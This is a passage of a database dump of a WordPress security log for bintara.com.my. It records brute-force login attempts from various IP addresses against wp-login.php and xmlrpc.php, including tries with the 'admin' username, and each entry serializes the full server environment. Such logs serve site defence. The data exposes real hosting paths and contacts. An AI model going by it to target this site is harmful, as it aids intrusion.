14:38:42',18157640,19647784,'https://bintara.com.my/wp/wp-login.php',1,0,'80.211.2.59'),(26332,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"/test/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"97\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/test/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/test/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYY2NHkXpgmG5P@iB8lANQAAAII\";s:12:\"REDIRECT_URL\";s:18:\"/test/wp-login.php\";s:11:\"REMOTE_ADDR\";s:13:\"159.65.85.105\";s:11:\"REMOTE_PORT\";s:5:\"42741\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:40:\"https://bintara.com.my/test/wp-login.php\";s:10:\"SCRIPT_URL\";s:18:\"/test/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYY2NHkXpgmG5P@iB8lANQAAAII\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1569076788.749\";s:12:\"REQUEST_TIME\";s:10:\"1569076788\";}}','notice','2019-09-21 14:39:50','2019-09-21 14:39:49',18162144,19649680,'https://bintara.com.my/test/wp-login.php',1,0,'159.65.85.105'),(26333,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"/2019/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"97\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/2019/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/2019/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYY2SXkXpgmG5P@iB8lARgAAAI0\";s:12:\"REDIRECT_URL\";s:18:\"/2019/wp-login.php\";s:11:\"REMOTE_ADDR\";s:13:\"118.238.4.201\";s:11:\"REMOTE_PORT\";s:5:\"57651\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:40:\"https://bintara.com.my/2019/wp-login.php\";s:10:\"SCRIPT_URL\";s:18:\"/2019/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYY2SXkXpgmG5P@iB8lARgAAAI0\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1569076809.875\";s:12:\"REQUEST_TIME\";s:10:\"1569076809\";}}','notice','2019-09-21 14:40:11','2019-09-21 14:40:10',18162144,19649680,'https://bintara.com.my/2019/wp-login.php',1,0,'118.238.4.201'),(26334,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:43:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"/2019/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"100\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/2019/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/2019/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYY2S3kXpgmG5P@iB8lASAAAAIM\";s:12:\"REDIRECT_URL\";s:18:\"/2019/wp-login.php\";s:11:\"REMOTE_ADDR\";s:13:\"177.21.15.122\";s:11:\"REMOTE_PORT\";s:5:\"45928\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:40:\"https://bintara.com.my/2019/wp-login.php\";s:10:\"SCRIPT_URL\";s:18:\"/2019/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYY2S3kXpgmG5P@iB8lASAAAAIM\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569076811.5999\";s:12:\"REQUEST_TIME\";s:10:\"1569076811\";}}','notice','2019-09-21 14:40:12','2019-09-21 14:40:12',18159624,19647800,'https://bintara.com.my/2019/wp-login.php',1,0,'177.21.15.122'),(23475,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"89\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:61.0.1) Gecko/20120101 Firefox/61.0.1\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"163.172.12.172\";s:11:\"REMOTE_PORT\";s:5:\"57416\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWwBYN9YzdT54U4Mrp-bYgAAAZg\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1567359328.8272\";s:12:\"REQUEST_TIME\";s:10:\"1567359328\";}}','notice','2019-09-01 17:35:30','2019-09-01 17:35:29',17688552,19179400,'https://bintara.com.my/wp-login.php',1,0,'163.172.12.172'),(23476,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:61.0.1) Gecko/20120101 Firefox/61.0.1\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"163.172.12.172\";s:11:\"REMOTE_PORT\";s:5:\"57757\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWwBZDU4VuPOeWsfkg0ZEwAAAQI\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1567359332.5824\";s:12:\"REQUEST_TIME\";s:10:\"1567359332\";}}','notice','2019-09-01 17:35:36','2019-09-01 17:35:33',18203872,19502416,'https://bintara.com.my/xmlrpc.php',1,0,'163.172.12.172'),(23477,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"90\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:12:\"50.63.12.204\";s:11:\"REMOTE_PORT\";s:5:\"56444\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWwNQt9YzdT54U4Mrp-hWQAAAYs\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1567362370.1269\";s:12:\"REQUEST_TIME\";s:10:\"1567362370\";}}','notice','2019-09-01 18:26:11','2019-09-01 18:26:10',17687416,19177720,'https://bintara.com.my/wp-login.php',1,0,'50.63.12.204'),(23478,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:12:\"50.63.12.204\";s:11:\"REMOTE_PORT\";s:5:\"56934\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWwNRDU4VuPOeWsfkg0aQwAAARM\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1567362373.0463\";s:12:\"REQUEST_TIME\";s:10:\"1567362373\";}}','notice','2019-09-01 18:26:14','2019-09-01 18:26:13',18204984,19504088,'https://bintara.com.my/xmlrpc.php',1,0,'50.63.12.204'),(23479,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"88\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"23.226.131.177\";s:11:\"REMOTE_PORT\";s:5:\"50968\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWwQXd9YzdT54U4Mrp-lkAAAAYE\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1567363165.2319\";s:12:\"REQUEST_TIME\";s:10:\"1567363165\";}}','notice','2019-09-01 18:39:26','2019-09-01 18:39:25',17691472,19181120,'https://bintara.com.my/wp-login.php',1,0,'23.226.131.177'),(23480,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 